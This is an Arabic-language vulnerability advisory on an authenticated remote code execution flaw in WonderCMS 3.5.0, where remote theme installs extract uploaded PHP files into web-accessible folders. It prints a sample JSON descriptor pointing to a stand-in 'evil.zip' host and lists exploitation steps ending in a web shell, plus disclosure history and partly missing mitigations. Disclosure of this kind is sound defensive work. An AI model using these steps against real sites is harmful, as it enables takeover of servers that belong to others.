
توجد ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بعد المصادقة في WonderCMS الإصدار 3.5.0.
تنبع المشكلة من كيفية تعامل التطبيق مع التثبيت عن بُعد للسمات/الوحدات عبر ملفات وصف JSON. عندما يرسل مسؤول ملف JSON عن بُعد يشير إلى أرشيف ZIP، يتم استخراج محتوياته إلى دليل يمكن الوصول إليه عبر الويب (مثل /themes/). إذا احتوى ملف ZIP على ملف PHP، يصبح هذا الملف متاحًا عبر الويب وقد يتم تنفيذه.
يطرح هذا السلوك خطر RCE بسبب:
ملاحظة: مطلوب مصادقة المسؤول، لكن التثبيتات الافتراضية تكشف كلمة مرور المسؤول علنًا (في الصفحة الرئيسية)، وتستخدم تسجيل دخول بكلمة مرور فقط، ولا تفرض ضوابط مصادقة قوية.
سيقبل WonderCMS ويحاول تثبيت الوحدات/السمات عن بُعد إذا كان وصف JSON المُرسَل يطابق تنسيق wcms-modules.json المتوقع. سيتم جلب الوصف الذي يجتاز فحص التنسيق (ويشير إلى أرشيف ZIP) واستخراج محتويات أرشيفه إلى دليل يمكن الوصول إليه عبر الويب (مثل /themes/<name>/) دون مزيد من التحقق من أنواع الملفات.
مثال على الوصف:
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
تحذير: لا تقم بالتشغيل على الأنظمة الإنتاجية. استخدم فقط بيئات الاختبار المصرح بها.
احصل على كلمة مرور المسؤول من الصفحة الرئيسية المكشوفة علنًا لتثبيت WonderCMS الافتراضي.
سجّل الدخول إلى لوحة الإدارة.
انتقل إلى قسم تثبيت السمات.
قدّم عنوان URL لوصف JSON خبيث (مثلًا، مستضاف على خادم يتحكم فيه المهاجم).
ابدأ التثبيت. سيقوم الخادم بالآتي:
ثبّت السمة الخبيثة التي تم تنزيلها.
الوصول إلى غلاف PHP المستخرج (مثل http://target.com/themes/<Theme_Name>/shell.php) لتنفيذ أوامر عشوائية.
(ملاحظة: نفّذ هذه الخطوات فقط في بيئة اختبار خاضعة للتحكم. استغلال هذه الثغرة على أنظمة حية دون إذن يُعدّ غير قانوني.)
تم الإبلاغ عن الثغرة إلى القائمين على صيانة WonderCMS في يوليو 2025.
أقرّ القائمون على الصيانة بالتقرير لكنهم أشاروا إلى أن هذا السلوك، من وجهة نظرهم، مقبول بالنسبة للمسؤولين.
لتقليل التعرض للخطر:
themes/ أو plugins/ عبر إعدادات الخادم.تُقدَّم هذه المعلومات لأغراض البحث الأمني الدفاعي والتعليم. احصل دائمًا على التفويض المناسب قبل اختبار الثغرات أو الكشف عنها.